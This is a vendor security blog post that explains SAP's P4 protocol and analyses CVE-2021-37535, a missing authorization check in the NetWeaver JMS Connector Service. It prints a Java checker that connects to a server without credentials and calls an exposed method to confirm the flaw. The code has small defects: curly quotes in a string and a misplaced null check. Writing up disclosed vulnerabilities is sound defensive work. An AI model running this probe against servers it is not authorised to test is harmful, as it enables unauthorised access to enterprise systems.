Skip links
Vahagn Vardanian

Vahagn Vardanian

Co-founder and CTO of RedRays

Exploring P4 Protocol: Usage, Implementation, and CVE-2021-37535

Introduction

The P4 protocol is important in Java remote communication, mainly with Java Naming and Directory Interface (JNDI) and Java Remote Method Invocation (RMI). It helps Java applications talk to remote objects across Java Virtual Machines (JVMs). In this article, we will discuss the P4 protocol, how it’s used, implementing client and server code, and basic security features.

Understanding P4 Protocol

The P4 protocol is made for Java remote communication and works well with JNDI and RMI. It lets Java applications interact with remote objects in different JVMs. P4 has several features, like:

  • Easy and efficient communication between JVMs
  • Support for turning objects into data and back
  • Managing connections and balancing workloads
  • Handling problems and recovering from them
  • Working with Java security features

How P4 Protocol is Used

P4 is mainly used in Java applications for remote communication between parts, such as:

  • JNDI Registry Service: P4 helps store and find remote objects in JNDI.
  • RMI communication: P4 works as the base for RMI, allowing interaction with remote objects.
  • Application servers and distributed systems: P4 is used for talking between parts in a distributed environment.

Creating P4 Client and Server Code

You can find examples of client-side and server-side implementations using this link: https://help.sap.com/saphelp_ewm900/helpdata/en/4a/eac9a0cd2823aee10000000a42189c/frameset.htm

Basic Security Features

P4 works with Java security features to make sure communication between client and server is safe. These security features include:

  • Java Authentication and Authorization Service (JAAS): P4 can work with JAAS to provide user authentication and authorization services for remote communication. JAAS lets you control access based on the client’s identity, making sure only allowed clients can use specific remote objects or methods.
  • Secure Socket Layer (SSL) / Transport Layer Security (TLS): P4 supports SSL/TLS to encrypt communication between client and server, keeping data private and safe during transfer. To use SSL/TLS with P4, you need to set up the Java Secure Socket Extension (JSSE) on both client and server sides and provide the needed settings.
  • Java Security Manager: P4 can work with the Java Security Manager to enforce security rules based on where the code comes from and who signed it. By setting proper security rules, you can control what remote objects are allowed to do, like accessing files, using the network, and more.

Analyzing CVE-2021-37535

Disclaimer:

Please note that this vulnerability was addressed and resolved by SAP two years ago. SAP has recently reaffirmed that the issue has been effectively fixed. The information provided in this article is intended to raise awareness about potential security risks and best practices for securing Java applications that use the P4 protocol for remote communication.

The following is a brief advisory and description of the vulnerability:

Title: Missing Authorization Check in SAP NetWeaver Application Server for Java (JMS Connector Service)

SAP note: 3078609

Description: The vulnerability was identified in the SAP JMS Connector Service that relies on the P4 protocol for establishing connections. A closer look at SAP patches disclosed that several crucial methods were left exposed without proper authorization within the P4 protocol. As a result, remote attackers could exploit these methods without needing authentication.

 

 

This security flaw posed a significant risk to the integrity and confidentiality of data transmitted between Java applications using the P4 protocol. The vulnerability could have potentially allowed unauthorized individuals to access sensitive information, tamper with data, or disrupt the normal operation of Java applications relying on remote communication.

To address the vulnerability and ensure secure communication, SAP took corrective action by introducing an authorization check, implemented through the checkPermissions function. This additional layer of security verifies the identity and permissions of the client before allowing access to the critical methods. Consequently, only clients with the appropriate authorization can call these methods, effectively mitigating the risk of unauthorized access and potential data breaches.

You can find the code for checking the vulnerability below:

public static Context init_conn(String connectionString, String user, String pass) throws NamingException {
      Properties p = new Properties();
      p.put("java.naming.factory.initial", "com.sap.engine.services.jndi.InitialContextFactoryImpl");
      p.put("java.naming.provider.url", connectionString);
      p.put("java.naming.factory.url.pkgs", "com.sap.engine.services");
      p.put("force_remote", "true");
      if (user != null) {
         p.put("java.naming.security.principal", user);
      }

      if (pass != null) {
         p.put("java.naming.security.credentials", pass);
      }

      Context ctx = null;

      try {
         ctx = new InitialContext(p);
      } catch (NamingException var8) {
         System.exit(-1);
      } finally {
         ;
      }
      return ctx;
   }

   public static void main(String[] args) throws UnsupportedEncodingException, Exception {
      
      Context ctx = init_conn(args[0], null, null);
      Object o = ctx.lookup(“jmsconnector”);
      JmsManager jms = (JmsManager)o;
      jms.getAllApplications();
      if (jms != null) {
         System.out
            .print("[!!!] The server is vulnerable. RedRays.io");
      } 
      System.exit(0);
   }

Additionally, SAP has fixed other vulnerabilities in services that communicate via the P4 protocol in the past few months. You can see the table below for more information:

CVSS ScoreCVE IDReference
5.3/10CVE-2023-264603288096
5.3/10CVE-2023-245263288394
5.3/10CVE-2023-272683288480
9.9/10CVE-2022-412723273480
9.9/10CVE-2023-238573252433
9.4/10CVE-2023-00173268093
9.4/10CVE-2022-412713267780

 

More to explorer

Special offer for SAP Security Udemy course!

$ 9.99

Join “SAP Security Core Concepts and Security Administration” which is part of the Blackhat course series.